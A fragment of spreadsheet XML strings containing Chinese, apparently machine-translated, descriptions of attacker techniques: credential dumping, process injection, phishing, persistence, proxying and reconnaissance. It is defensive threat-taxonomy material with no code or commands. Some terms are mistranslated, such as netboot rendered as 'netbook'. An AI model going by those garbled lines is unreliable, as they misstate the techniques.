  </si>
  <si>
    <t>攻击者可能试图通过加密、编码或以其他方式混淆系统上或传输中的可执行文件或文件的内容，使其难以发现或分析。这是一种常见的行为，可以跨不同的平台和网络来逃避防御。</t>
  </si>
  <si>
    <t>攻击者可能会使用二进制填充来添加垃圾数据，并更改恶意软件的磁盘表示形式。这可以在不影响二进制文件的功能或行为的情况下完成，但由于文件大小的限制，可能会使二进制文件的大小超出某些安全工具能够处理的范围。</t>
  </si>
  <si>
    <t>攻击者可能会执行软件打包或虚拟机软件保护以隐藏其代码。软件打包是一种压缩或加密可执行文件的方法。打包可执行文件会更改文件签名，以避免基于签名的检测。大多数解压技术将可执行代码解压到内存中。虚拟机软件保护将可执行文件的原始代码转换为只有特殊虚拟机才能运行的特殊格式。然后调用一个虚拟机来运行此代码。</t>
  </si>
  <si>
    <t>攻击者可能会使用隐写术技术来防止隐藏信息的检测。隐写术技术可用于隐藏数字媒体中的数据，如图像、音频曲目、视频剪辑或文本文件。</t>
  </si>
  <si>
    <t>攻击者可能会试图通过将文件作为未编译代码交付给受害者，从而使有效载荷难以发现和分析。基于文本的源代码文件可能会破坏针对可执行文件/二进制文件的保护的分析和审查。这些有效载荷需要在执行前进行编译；通常通过本地实用程序，如csc。exe或GCC/MinGW。</t>
  </si>
  <si>
    <t>如果攻击者认为他们的恶意工具已被检测、隔离或以其他方式限制，他们可以从工具中删除指示器。他们可以通过移除指示器并使用目标防御系统或可能使用类似系统的后续目标不再检测到的更新版本来修改该工具。</t>
  </si>
  <si>
    <t>攻击者可能通过在看似良性的HTML文件中隐藏恶意有效载荷，将数据和文件通过内容过滤器走私出去。HTML文档可以存储称为JavaScript Blob（表示原始字节的不可变数据）的大型二进制对象，这些对象以后可以构造成类似文件的对象。数据也可以存储在数据URL中，这样可以将媒体类型或MIME文件嵌入HTML文档中。HTML5还引入了下载属性，可用于启动文件下载。</t>
  </si>
  <si>
    <t>攻击者可能会购买和/或窃取可在瞄准过程中使用的能力。攻击者可能会购买、免费下载或窃取它们，而不是在内部开发自己的能力。活动可能包括获取恶意软件、软件（包括许可证）、漏洞利用、证书以及与漏洞相关的信息。攻击者可以在其生命周期的多个阶段获得支持其作战的能力。</t>
  </si>
  <si>
    <t>攻击者可能会购买、窃取或下载可在瞄准过程中使用的恶意软件。恶意软件可能包括有效载荷、滴管、泄露后工具、后门、打包机和C2协议。攻击者可能会获取恶意软件来支持其操作，获得一种手段来维持对远程机器的控制，躲避防御，并执行泄露后的行为。</t>
  </si>
  <si>
    <t>攻击者可能会购买、窃取或下载可在瞄准过程中使用的软件工具。工具可以是开源的，也可以是开源的，免费的，也可以是商用的。一个工具可以被攻击者用于恶意目的，但（与恶意软件不同的是）不打算用于这些目的（例如：PsExec）。工具采购可能涉及商业软件许可证的采购，包括Cobalt Strike等红队工具的采购。商业软件可以通过购买、窃取许可证（或软件的许可副本）或破解试用版获得。</t>
  </si>
  <si>
    <t>攻击者可能会购买和/或窃取可在目标锁定期间使用的代码签名证书。代码签名是对可执行文件和脚本进行数字签名的过程，以确认软件作者并保证代码未被修改或损坏。代码签名为开发人员提供程序的真实性级别，并保证程序未被篡改。用户和/或安全工具可能更信任已签名的代码而不是未签名的代码，即使他们不知道是谁颁发了证书或作者是谁。</t>
  </si>
  <si>
    <t>攻击者可能会购买和/或窃取可在瞄准过程中使用的SSL/TLS证书。SSL/TLS证书旨在灌输信任。它们包括有关密钥的信息、有关其所有者身份的信息，以及已验证证书内容正确的实体的数字签名。如果签名有效，并且检查证书的人信任签名者，那么他们知道可以使用该密钥与证书所有者通信。</t>
  </si>
  <si>
    <t>攻击者可能会购买、窃取或下载可在瞄准过程中使用的漏洞。漏洞利用漏洞或漏洞，导致计算机硬件或软件出现意外行为。攻击者可能不会开发自己的漏洞，而是从网上发现/修改漏洞，或从漏洞供应商处购买。</t>
  </si>
  <si>
    <t>攻击者可能会获取有关在瞄准过程中可以使用的漏洞的信息。漏洞是计算机硬件或软件中的一个弱点，可能会被攻击者利用，导致意外或意外行为的发生。攻击者可以通过搜索开放的数据库或访问封闭的漏洞数据库来发现漏洞信息。</t>
  </si>
  <si>
    <t>攻击者可能会利用基于Microsoft Office的应用程序在初创企业之间实现持久性。Microsoft Office是企业网络中基于Windows的操作系统上相当常见的应用程序套件。当基于Office的应用程序启动时，Office可以使用多种机制来实现持久性；这可以包括使用Office模板宏和加载项。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Microsoft Office模板在受损系统上获得持久性。Microsoft Office包含的模板是常用Office应用程序的一部分，用于自定义样式。每次应用程序启动时都会使用应用程序中的基本模板。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Microsoft Office“Office测试”注册表项，以在受损系统上获得持久性。Office测试注册表位置允许用户指定任意DLL，该DLL将在每次启动Office应用程序时执行。该注册表项被认为是Microsoft在开发Office应用程序时用于加载DLL以进行测试和调试。默认情况下，Office安装期间不会创建此注册表项。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Microsoft Outlook表单在受损系统上获取持久性。Outlook表单用作Outlook邮件中演示文稿和功能的模板。可以创建自定义Outlook表单，当攻击者使用相同的自定义Outlook表单发送特制的电子邮件时，这些表单将执行代码。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Microsoft Outlook的主页功能，在受损系统上获得持久性。Outlook主页是一项传统功能，用于自定义Outlook文件夹的显示方式。此功能允许在打开文件夹时加载和显示内部或外部URL。可以创建恶意HTML页面，在Outlook主页加载时执行代码。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Microsoft Outlook规则在受损系统上获得持久性。Outlook规则允许用户定义管理电子邮件的自动行为。例如，如果电子邮件包含特定发件人的特定单词，良性规则可能会自动将其移动到Outlook中的特定文件夹。当攻击者向该用户发送精心编制的电子邮件时，可以创建恶意Outlook规则，从而触发代码执行。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Microsoft Office加载项在受损系统上获得持久性。Office加载项可用于向Office程序添加功能。不同的办公产品可以使用不同类型的插件；包括Word/Excel加载项库（WLL/XLL）、VBA加载项、Office组件对象模型（COM）加载项、自动化加载项、VBA编辑器（VBE）、Visual Studio Tools for Office（VSTO）加载项和Outlook加载项。</t>
  </si>
  <si>
    <t>攻击者可能会试图转储凭据，以从操作系统和软件获取帐户登录和凭据材料，通常以哈希或明文密码的形式。凭证可用于执行横向移动和访问受限信息。</t>
  </si>
  <si>
    <t>攻击者可能试图访问存储在本地安全机构子系统服务（LSASS）进程内存中的凭证材料。用户登录后，系统会在LSASS进程内存中生成并存储各种凭证材料。这些凭证材料可由管理用户或系统获取，并使用替代认证材料进行横向移动。</t>
  </si>
  <si>
    <t>攻击者可能试图通过内存技术或存储SAM数据库的Windows注册表从安全帐户管理器（SAM）数据库中提取凭证材料。SAM是一个数据库文件，其中包含主机的本地帐户，通常是通过net user命令找到的帐户。枚举SAM数据库需要系统级访问。</t>
  </si>
  <si>
    <t>攻击者可能试图访问或创建Active Directory域数据库的副本，以窃取凭据信息，以及获取有关域成员的其他信息，如设备、用户和访问权限。默认情况下，NTDS文件（NTDS.dit）位于%SystemRoot%\NTDS\NTDS中。域控制器的dit。</t>
  </si>
  <si>
    <t>具有主机系统访问权限的攻击者可能会尝试访问本地安全机构（LSA）机密，其中可能包含各种不同的凭据材料，例如服务帐户的凭据。LSA机密存储在HKEY_LOCAL_MACHINE\SECURITY\Policy\secrets的注册表中。LSA机密也可以从内存中转储。</t>
  </si>
  <si>
    <t>当域控制器不可用时，攻击者可能会尝试访问缓存的域凭据，以允许进行身份验证。</t>
  </si>
  <si>
    <t>攻击者可能试图通过滥用Windows域控制器的应用程序编程接口（API）来访问凭据和其他敏感信息，以使用称为DCSync的技术模拟远程域控制器的复制过程。</t>
  </si>
  <si>
    <t>攻击者可以从存储在Proc文件系统或/Proc中的信息中收集凭据。Linux上的Proc文件系统包含大量有关运行操作系统状态的信息。以root权限运行的进程可以使用此功能刮取其他正在运行的程序的活动内存。如果这些程序中的任何一个在内存中以明文或密码散列形式存储密码，那么这些值可以分别用于使用或暴力攻击。</t>
  </si>
  <si>
    <t>攻击者可能会尝试转储/etc/passwd和/etc/shadow的内容，以启用脱机密码破解。大多数现代Linux操作系统使用/etc/passwd和/etc/shadow的组合来存储用户帐户信息，包括/etc/shadow中的密码哈希。默认情况下，/etc/shadow只能由root用户读取。</t>
  </si>
  <si>
    <t>攻击者可能会试图访问有关企业网络或云环境中使用的密码策略的详细信息。密码策略是一种强制执行复杂密码的方法，这些密码很难猜测或通过暴力破解。此信息可能有助于攻击者创建常用密码列表，并根据策略发起字典和/或暴力攻击（例如，如果最小密码长度应为8，则不尝试“pass123”等密码；如果锁定设置为6，则每个帐户的密码检查次数不超过3-4次，以便不锁定帐户）。</t>
  </si>
  <si>
    <t>攻击者可能试图收集与计算机系统相连的外围设备和组件的信息。外围设备可以包括支持各种功能的辅助资源，如键盘、打印机、摄像头、智能卡读卡器或可移动存储器。这些信息可用于增强他们对系统和网络环境的意识，或用于进一步的行动。</t>
  </si>
  <si>
    <t>攻击者可能会尝试查找组和权限设置。这些信息可以帮助攻击者确定哪些用户帐户和组可用，特定组中用户的成员身份，以及哪些用户和组具有提升的权限。</t>
  </si>
  <si>
    <t>攻击者可能会试图找到本地系统组和权限设置。了解本地系统权限组可以帮助攻击者确定存在哪些组以及哪些用户属于特定组。攻击者可以使用此信息来确定哪些用户具有提升的权限，例如在本地管理员组中找到的用户。</t>
  </si>
  <si>
    <t>攻击者可能会试图找到域级别的组和权限设置。对域级权限组的了解可以帮助攻击者确定存在哪些组以及哪些用户属于特定组。攻击者可能会使用此信息来确定哪些用户拥有提升的权限，例如域管理员。</t>
  </si>
  <si>
    <t>攻击者可能会尝试查找云组和权限设置。云权限组的知识可以帮助攻击者确定用户和组在环境中的特定角色，以及哪些用户与特定组关联。</t>
  </si>
  <si>
    <t>攻击者可能会发送网络钓鱼信息以访问受害者系统。所有形式的网络钓鱼都是通过电子方式传递的社会工程。网络钓鱼是有针对性的，被称为“鱼叉式网络钓鱼”。在网络钓鱼中，特定的个人、公司或行业将成为攻击者的目标。更一般地说，攻击者可以进行无目标的网络钓鱼，例如在大规模恶意软件垃圾邮件活动中。</t>
  </si>
  <si>
    <t>攻击者可能会发送带有恶意附件的网络钓鱼电子邮件，试图访问受害者系统。网络钓鱼附件是网络钓鱼的一种特殊变体。网络钓鱼附件不同于其他形式的网络钓鱼，因为它使用电子邮件中附加的恶意软件。所有形式的网络钓鱼都是针对特定个人、公司或行业的电子社交工程。在这种情况下，攻击者将一个文件附加到网络钓鱼电子邮件上，通常依靠用户执行来获得执行。网络钓鱼还可能涉及社会工程技术，比如冒充可信来源。</t>
  </si>
  <si>
    <t>攻击者可能会发送带有恶意链接的网络钓鱼电子邮件，试图访问受害者系统。带有链接的网络钓鱼是网络钓鱼的一种特殊变体。它不同于其他形式的网络钓鱼，因为它利用链接下载电子邮件中包含的恶意软件，而不是将恶意文件附加到电子邮件本身，以避免可能检查电子邮件附件的防御。网络钓鱼还可能涉及社会工程技术，比如冒充可信来源。</t>
  </si>
  <si>
    <t>攻击者可能通过第三方服务发送网络钓鱼信息，试图访问受害者系统。通过服务的网络钓鱼是网络钓鱼的一种特殊变体。它不同于其他形式的网络钓鱼，因为它使用第三方服务，而不是直接通过企业电子邮件渠道。</t>
  </si>
  <si>
    <t>攻击者可能会发送网络钓鱼信息，以获取可在瞄准过程中使用的敏感信息。网络钓鱼获取信息是一种试图诱骗目标泄露信息的行为，通常包括身份证明或其他可采取行动的信息。针对信息的网络钓鱼与网络钓鱼不同，其目的是从受害者那里收集数据，而不是执行恶意代码。</t>
  </si>
  <si>
    <t>攻击者可能会通过第三方服务发送网络钓鱼信息，以获取可在瞄准过程中使用的敏感信息。针对信息的网络钓鱼是一种试图欺骗目标泄露信息的行为，通常是凭证或其他可采取行动的信息。针对信息的网络钓鱼经常涉及社会工程技术，例如冒充信息来源，并有收集信息的理由（例如：建立账户或泄露账户）和/或发送多条看似紧急的消息。</t>
  </si>
  <si>
    <t>攻击者可能会发送带有恶意附件的网络钓鱼消息，以获取可在目标锁定期间使用的敏感信息。针对信息的网络钓鱼是一种试图欺骗目标泄露信息的行为，通常是凭证或其他可采取行动的信息。针对信息的网络钓鱼经常涉及社会工程技术，例如冒充信息来源，并有收集信息的理由（例如：建立账户或泄露账户）和/或发送多条看似紧急的消息。</t>
  </si>
  <si>
    <t>攻击者可能会发送带有恶意链接的网络钓鱼信息，以获取可在瞄准过程中使用的敏感信息。针对信息的网络钓鱼是一种试图欺骗目标泄露信息的行为，通常是凭证或其他可采取行动的信息。针对信息的网络钓鱼经常涉及社会工程技术，例如冒充信息来源，并有收集信息的理由（例如：建立账户或泄露账户）和/或发送多条看似紧急的消息。</t>
  </si>
  <si>
    <t>攻击者可能会滥用操作系统启动前的机制，作为在系统上建立持久性的一种方式。在计算机引导过程中，固件和各种启动服务在操作系统之前加载。这些程序在操作系统控制之前控制执行流程。</t>
  </si>
  <si>
    <t>攻击者可能会修改系统固件以在系统上保持。BIOS（基本输入/输出系统）和统一可扩展固件接口（UEFI）或可扩展固件接口（EFI）是作为操作系统和计算机硬件之间的软件接口运行的系统固件的示例。</t>
  </si>
  <si>
    <t>攻击者可能会修改组件固件以在系统上保持。一些攻击者可能会采用复杂的手段破坏计算机组件，并安装恶意固件，这些固件将在操作系统和主系统固件或BIOS之外执行攻击者代码。该技术可能类似于系统固件，但在可能不具备相同完整性检查能力或水平的其他系统组件/设备上进行。</t>
  </si>
  <si>
    <t>攻击者可以使用引导包在系统上持久化。引导包位于操作系统下面的一层，可能会使执行完全修复变得困难，除非组织怀疑使用了引导包，并且可以采取相应的行动。</t>
  </si>
  <si>
    <t>攻击者可能会滥用ROM监视器（ROMMON），方法是使用攻击者代码加载未经授权的固件，以提供持久访问并操纵难以检测的设备行为。</t>
  </si>
  <si>
    <t>攻击者可能会滥用上网本从普通文件传输协议（TFTP）服务器加载未经授权的网络设备操作系统。网络管理员通常使用TFTP引导（netbooting）从集中管理服务器加载配置控制的网络设备映像。上网本是引导序列中的一个选项，可用于集中、管理和控制设备映像。</t>
  </si>
  <si>
    <t>攻击者可能会试图获取有关系统上正在运行的进程的信息。获得的信息可用于了解网络内系统上运行的常见软件/应用程序。攻击者可能会在自动发现过程中使用来自流程发现的信息来塑造后续行为，包括攻击者是否完全感染目标和/或尝试特定行动。</t>
  </si>
  <si>
    <t>攻击者可能会向进程中注入代码，以逃避基于进程的防御，并可能提升权限。进程注入是一种在单独的实时进程的地址空间中执行任意代码的方法。在另一个进程的上下文中运行代码可能允许访问该进程的内存、系统/网络资源，以及可能提升的权限。通过进程注入执行也可能逃避安全产品的检测，因为执行是在合法进程下隐藏的。</t>
  </si>
  <si>
    <t>攻击者可能会将动态链接库（DLL）注入进程，以逃避基于进程的防御，并可能提升权限。DLL注入是一种在单独的实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能会将可移植可执行文件（PE）注入进程，以逃避基于进程的防御，并可能提升权限。PE注入是一种在单独的实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能会将恶意代码注入被劫持的进程，以逃避基于进程的防御，并可能提升权限。线程执行劫持是一种在单独的实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能通过异步过程调用（APC）队列将恶意代码注入进程，以逃避基于进程的防御，并可能提升权限。APC注入是一种在单独的实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能通过线程本地存储（TLS）回调将恶意代码注入进程，以逃避基于进程的防御，并可能提升权限。TLS回调注入是一种在单独的实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能通过ptrace（进程跟踪）系统调用将恶意代码注入进程，以逃避基于进程的防御，并可能提升权限。Ptrace系统调用注入是一种在单独的实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能通过/proc文件系统将恶意代码注入进程，以逃避基于进程的防御，并可能提升权限。Proc内存注入是一种在独立实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能通过额外窗口内存（EWM）将恶意代码注入进程，以逃避基于进程的防御，并可能提升权限。EWM注入是一种在独立实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能会将恶意代码注入挂起和掏空的进程，以逃避基于进程的防御。进程空洞化是一种在单独的活动进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能通过进程复制将恶意代码注入进程，以逃避基于进程的防御，并可能提升权限。Process doppelgäinging是一种在单独的实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可能通过VDSO劫持将恶意代码注入进程，以逃避基于进程的防御，并可能提升权限。虚拟动态共享对象（vdso）劫持是一种在单独的实时进程的地址空间中执行任意代码的方法。</t>
  </si>
  <si>
    <t>攻击者可以使用连接代理来引导系统之间的网络流量，或者充当与指挥和控制服务器进行网络通信的中介，以避免直接连接到其基础设施。有许多工具可以通过代理或端口重定向来实现流量重定向，包括HTRAN、ZXProxy和ZXPortMap。攻击者使用这些类型的代理来管理指挥和控制通信，减少同时出站网络连接的数量，在连接丢失时提供恢复能力，或者绕过受害者之间现有的可信通信路径以避免怀疑。攻击者可能会将多个代理链接在一起，以进一步掩盖恶意流量的来源。</t>
  </si>
  <si>
    <t>攻击者可以使用内部代理在受损环境中指挥和控制两个或多个系统之间的通信。有许多工具可以通过代理或端口重定向来实现流量重定向，包括HTRAN、ZXProxy和ZXPortMap。攻击者使用内部代理来管理受损环境中的指挥和控制通信，减少同步出站网络连接的数量，在连接丢失时提供恢复能力，或绕过受感染系统之间现有的可信通信路径以避免怀疑。内部代理连接可以使用常见的对等（p2p）网络协议，如SMB，以更好地融入环境。</t>
  </si>
  <si>
    <t>攻击者可以使用外部代理作为与指挥控制服务器进行网络通信的中介，以避免直接连接到其基础设施。有许多工具可以通过代理或端口重定向来实现流量重定向，包括HTRAN、ZXProxy和ZXPortMap。攻击者使用这些类型的代理来管理指挥和控制通信，在连接丢失时提供恢复能力，或者绕过现有的可信通信路径以避免怀疑。</t>
  </si>
  <si>
    <t>为了掩盖恶意流量的来源，攻击者可以将多个代理链接在一起。通常情况下，防御者将能够识别在进入其网络之前经过的最后一个代理流量；在最后一跳代理之前，防御者可能无法识别之前的任何代理。这种技术要求防御者通过多个代理追踪恶意流量以识别其来源，从而使识别恶意流量的原始来源变得更加困难。这种行为的一个特殊变体是使用洋葱路由网络，例如公开的TOR网络。</t>
  </si>
  <si>
    <t>攻击者可能会利用内容交付网络（CDN）和承载多个域的其他服务中的路由方案来混淆HTTPS流量或通过HTTPS隧道传输的流量的预期目的地。域名前置涉及在TLS标头的SNI字段和HTTP标头的Host字段中使用不同的域名。如果两个域都来自同一个CDN，则CDN可以在解开TLS报头后路由到HTTP报头中指定的地址。该技术的一个变体，“无域”前沿使用了一个保留空白的SNI字段；即使CDN尝试验证SNI和HTTP主机字段匹配（如果忽略空的SNI字段），也可以允许前端工作。</t>
  </si>
  <si>
    <t>攻击者可能会与Windows注册表交互，以收集有关系统、配置和已安装软件的信息。</t>
  </si>
  <si>
    <t>攻击者可能会反射性地将代码加载到进程中，以隐藏恶意有效负载的执行。反射加载涉及直接在进程内存中分配然后执行有效负载，反之亦然，创建一个由磁盘上的文件路径支持的线程或进程。反射加载的有效载荷可以是编译后的二进制文件、匿名文件（仅存在于RAM中），或者只是少量无文件可执行代码（例如：位置独立外壳代码）。</t>
  </si>
  <si>
    <t>攻击者可以使用合法的桌面支持和远程访问软件，如Team Viewer、Go2Assist、LogMein、AmmyyAdmin等，建立一个交互式的指挥和控制通道，以在网络中瞄准系统。这些服务通常用作合法的技术支持软件，目标环境中的应用程序控制可能允许这些服务。与攻击者常用的其他合法软件相比，VNC、Ammyy和Teamviewer等远程访问工具被频繁使用。</t>
  </si>
  <si>
    <t>攻击者可以通过远程服务控制预先存在的会话，以便在环境中横向移动。用户可以使用有效凭据登录到专门为接受远程连接而设计的服务，如telnet、SSH和RDP。当用户登录到服务时，将建立一个会话，允许他们与该服务保持持续的交互。</t>
  </si>
  <si>
    <t>攻击者可能会劫持合法用户的SSH会话，以便在环境中横向移动。Secure Shell（SSH）是Linux和macOS系统上远程访问的标准方式。它允许用户通过加密隧道连接到另一个系统，通常通过密码、证书或使用非对称加密密钥对进行身份验证。</t>
  </si>
  <si>
    <t>攻击者可能会劫持合法用户的远程桌面会话，以便在环境中横向移动。远程桌面是操作系统中的常见功能。它允许用户通过远程系统上的系统桌面图形用户界面登录到交互式会话。微软将其远程桌面协议（RDP）的实现称为远程桌面服务（RDS）。</t>
  </si>
  <si>
    <t>攻击者可以使用有效的帐户登录专门设计用于接受远程连接的服务，如telnet、SSH和VNC。然后，攻击者可以作为登录用户执行操作。</t>
  </si>
  <si>
    <t>攻击者可以使用有效帐户使用远程桌面协议（RDP）登录计算机。然后，攻击者可以作为登录用户执行操作。</t>
  </si>
  <si>
    <t>攻击者可以使用有效的帐户通过服务器消息块（SMB）与远程网络共享进行交互。然后，攻击者可以作为登录用户执行操作。</t>
  </si>
  <si>
    <t>攻击者可以利用分布式组件对象模型（DCOM）使用有效帐户与远程计算机进行交互。然后，攻击者可以作为登录用户执行操作。</t>
  </si>
  <si>
    <t>攻击者可以使用有效帐户登录到使用Secure Shell（SSH）的远程计算机。然后，攻击者可以作为登录用户执行操作。</t>
  </si>
  <si>
    <t>攻击者可以使用有效的帐户通过虚拟网络计算（VNC）远程控制机器。VNC是一个独立于平台的桌面共享系统，它使用RFB（“远程帧缓冲区”）协议，使用户能够通过网络中继屏幕、鼠标和键盘输入，远程控制另一台计算机的显示。</t>
  </si>
  <si>
    <t>攻击者可以使用有效的帐户与使用Windows远程管理（WinRM）的远程系统进行交互。然后，攻击者可以作为登录用户执行操作。</t>
  </si>
  <si>
    <t>攻击者可能试图通过IP地址、主机名或网络上的其他逻辑标识符获取其他系统的列表，这些系统可能用于从当前系统进行横向移动。远程访问工具中可能存在实现这一点的功能，但操作系统上可用的实用程序也可以使用，例如Ping或使用net的net view。攻击者还可以使用本地主机文件（例如：C:\Windows\System32\Drivers\etc\hosts或/etc/hosts）来发现远程系统的主机名到IP地址的映射。</t>
  </si>
  <si>
    <t>通过将恶意软件复制到可移动媒体，并在媒体插入系统并执行时利用自动运行功能，攻击者可能会进入系统，可能是那些在断开连接或气隙网络上的系统。在横向移动的情况下，可能会通过修改存储在可移动媒体上的可执行文件，或复制恶意软件并将其重命名为合法文件，以诱骗用户在单独的系统上执行。在初始访问的情况下，这可能通过手动操作介质、修改用于初始格式化介质的系统或修改介质固件本身来实现。</t>
  </si>
  <si>
    <t>攻击者可能会利用增选系统的资源来解决可能影响系统和/或托管服务可用性的资源密集型问题。</t>
  </si>
  <si>
    <t>攻击者可能会注册一个恶意域控制器来操纵Active Directory数据。DCShadow可用于创建恶意域控制器（DC）。DCShadow是一种通过注册（或重用非活动注册）和模拟DC行为来操作Active Directory（AD）数据（包括对象和模式）的方法。一旦注册，流氓DC就可以将更改注入并复制到任何域对象的AD基础设施中，包括凭据和密钥。</t>
  </si>
  <si>
    <t>攻击者可以使用rootkit隐藏程序、文件、网络连接、服务、驱动程序和其他系统组件。rootkit是通过拦截/挂接和修改提供系统信息的操作系统API调用来隐藏恶意软件存在的程序。</t>
  </si>
  <si>
    <t>攻击者可能会滥用任务调度功能来促进恶意代码的初始或重复执行。在所有主要的操作系统中都有一些实用程序，用来安排程序或脚本在指定的日期和时间执行。如果满足适当的身份验证（例如：Windows环境中的RPC以及文件和打印机共享），也可以在远程系统上安排任务。在远程系统上调度任务通常需要成为远程系统上管理员或其他特权组的成员。</t>
  </si>
  <si>
    <t>攻击者可能会滥用at实用程序来执行任务调度，以初始、重复或未来执行恶意代码。Linux操作系统中的at命令允许管理员安排任务。</t>
  </si>
  <si>
    <t>攻击者可能会滥用at。exe实用程序，用于为恶意代码的初始或重复执行执行任务计划。at实用程序作为可执行文件存在于Windows中，用于在指定的时间和日期安排任务。使用at要求任务计划程序服务正在运行，并且用户必须作为本地Administrators组的成员登录。</t>
  </si>
  <si>
    <t>攻击者可能会滥用cron实用程序来执行任务调度，以初始或重复执行恶意代码。cron实用程序是一种基于时间的作业调度器，适用于类Unix操作系统。crontab文件包含要运行的cron条目的时间表和指定的执行时间。任何crontab文件都存储在操作系统特定的文件路径中。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Windows任务计划程序来执行任务计划，以初始或重复执行恶意代码。有多种方法可以访问Windows中的任务计划程序。schtasks可以直接在命令行上运行，也可以通过控制面板的Administrator Tools部分中的GUI打开Task Scheduler。在某些情况下，攻击者使用了。NET包装器，或者，攻击者使用Windows netapi32库创建计划任务。</t>
  </si>
  <si>
    <t>攻击者可能会滥用systemd定时器来执行任务调度，以初始或重复执行恶意代码。Systemd定时器是具有文件扩展名的单位文件。控制服务的计时器。计时器可以设置为在日历事件上运行，或在相对于起点的时间跨度之后运行。它们可以作为Linux环境中Cron的替代品。Systemd定时器可以通过systemctl命令行实用程序远程激活，该实用程序通过SSH操作。</t>
  </si>
  <si>
    <t>攻击者可能会滥用容器编排工具（如Kubernetes）提供的任务调度功能来调度配置为执行恶意代码的容器的部署。容器编排作业在特定日期和时间运行这些自动化任务，类似于Linux系统上的cron作业。这种类型的部署还可以配置为随着时间的推移维护大量容器，从而自动化集群内维护持久性的过程。</t>
  </si>
  <si>
    <t>攻击者可能会安排只在一天中的特定时间或特定时间间隔进行数据过滤。这样做可以将交通模式与正常活动或可用性结合起来。</t>
  </si>
  <si>
    <t>攻击者可能会试图截取桌面的屏幕，以便在操作过程中收集信息。屏幕捕获功能可作为用于事后操作的远程访问工具的一项功能。通常也可以通过本机实用程序或API调用（如CopyFromScreen、xwd或Screen Capture）拍摄屏幕截图。</t>
  </si>
  <si>
    <t>敌人可以从封闭的来源搜索和收集受害者的信息，这些信息可以在瞄准过程中使用。有关受害者的信息可以从信誉良好的私人来源和数据库购买，例如付费订阅技术/威胁情报数据源。攻击者也可能从声誉较低的来源购买信息，如黑暗网络或网络犯罪黑市。</t>
  </si>
  <si>
    <t>攻击者可能会购买有关受害者的技术信息，以便在瞄准过程中使用。有关受害者的信息可以在信誉良好的私人来源和数据库中购买，例如付费订阅扫描数据库或其他数据聚合服务的提要。攻击者也可能从声誉较低的来源购买信息，如黑暗网络或网络犯罪黑市。</t>
  </si>
  <si>
    <t>攻击者可能会搜索DNS数据，以获取目标锁定期间可使用的受害者信息。DNS信息可能包括各种详细信息，包括注册名称服务器以及概述目标子域、邮件服务器和其他主机地址的记录。</t>
  </si>
  <si>
    <t>攻击者可能会搜索WHOIS的公共数据，以获取目标锁定期间可以使用的受害者信息。WHOIS数据由负责分配和分配域名等互联网资源的区域互联网注册中心（RIR）存储。任何人都可以查询WHOIS服务器，以获取有关已注册域的信息，例如分配的IP块、联系信息和DNS名称服务器。</t>
  </si>
  <si>
    <t>攻击者可能会搜索公共数字证书数据，以获取目标锁定期间可使用的受害者信息。数字证书由证书颁发机构（CA）颁发，以加密方式验证签名内容的来源。这些证书，例如用于加密web通信（HTTPS SSL/TLS通信）的证书，包含有关注册组织的信息，例如名称和位置。</t>
  </si>
  <si>
    <t>攻击者可以搜索内容交付网络（CDN）中有关受害者的数据，这些数据可以在目标锁定过程中使用。CDN允许组织托管来自分布式、负载平衡的服务器阵列的内容。CDN还允许组织根据请求者的地理区域定制内容交付。</t>
  </si>
  <si>
    <t>攻击者可以搜索免费的网站和/或域名，以获取目标锁定期间可使用的受害者信息。关于受害者的信息可以在各种在线网站上获得，比如社交媒体、新网站，或者那些提供有关商业运营信息的网站，比如雇佣或请求/奖励合同。</t>
  </si>
  <si>
    <t>攻击者可能会在社交媒体上搜索有关受害者的信息，以便在锁定目标时使用。社交媒体网站可能包含有关受害者组织的各种信息，如商业公告以及有关员工角色、位置和兴趣的信息。</t>
  </si>
  <si>
    <t>攻击者可能会使用搜索引擎来收集受害者的信息，这些信息可以在锁定目标时使用。搜索引擎服务典型地抓取在线站点来索引上下文，并可能为用户提供专门的语法来搜索特定的关键字或特定类型的内容（即文件类型）。</t>
  </si>
  <si>
    <t>攻击者可能会在受害者的网站上搜索可以在瞄准过程中使用的信息。受害者拥有的网站可能包含各种详细信息，包括部门/部门的名称、实际位置和关键员工的数据，如姓名、角色和联系信息（例如：电子邮件地址）。这些网站还可能有强调业务运营和关系的详细信息。</t>
  </si>
  <si>
    <t>攻击者可能会滥用服务器的合法可扩展开发功能来建立对系统的持久访问。企业服务器应用程序可能包括允许开发人员编写和安装软件或脚本以扩展主应用程序功能的功能。攻击者可能会安装恶意组件来扩展和滥用服务器应用程序。</t>
  </si>
  <si>
    <t>攻击者可能会滥用SQL存储过程来建立对系统的持久访问。SQL存储过程是可以保存和重用的代码，这样数据库用户就不会浪费时间重写频繁使用的SQL查询。存储过程可以通过使用过程名称的SQL语句调用数据库，也可以通过定义的事件调用（例如，当SQL server应用程序启动/重新启动时）。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Microsoft传输代理来建立对系统的持久访问。Microsoft Exchange transport Agent可以对通过传输管道的电子邮件进行操作，以执行各种任务，例如过滤垃圾邮件、过滤恶意附件、记录日志，或在所有传出电子邮件的末尾添加公司签名。传输代理可以由应用程序开发人员编写，然后编译为。NET程序集，这些程序集随后在Exchange服务器上注册。传输代理将在电子邮件处理的指定阶段调用，并执行开发人员定义的任务。</t>
  </si>
  <si>
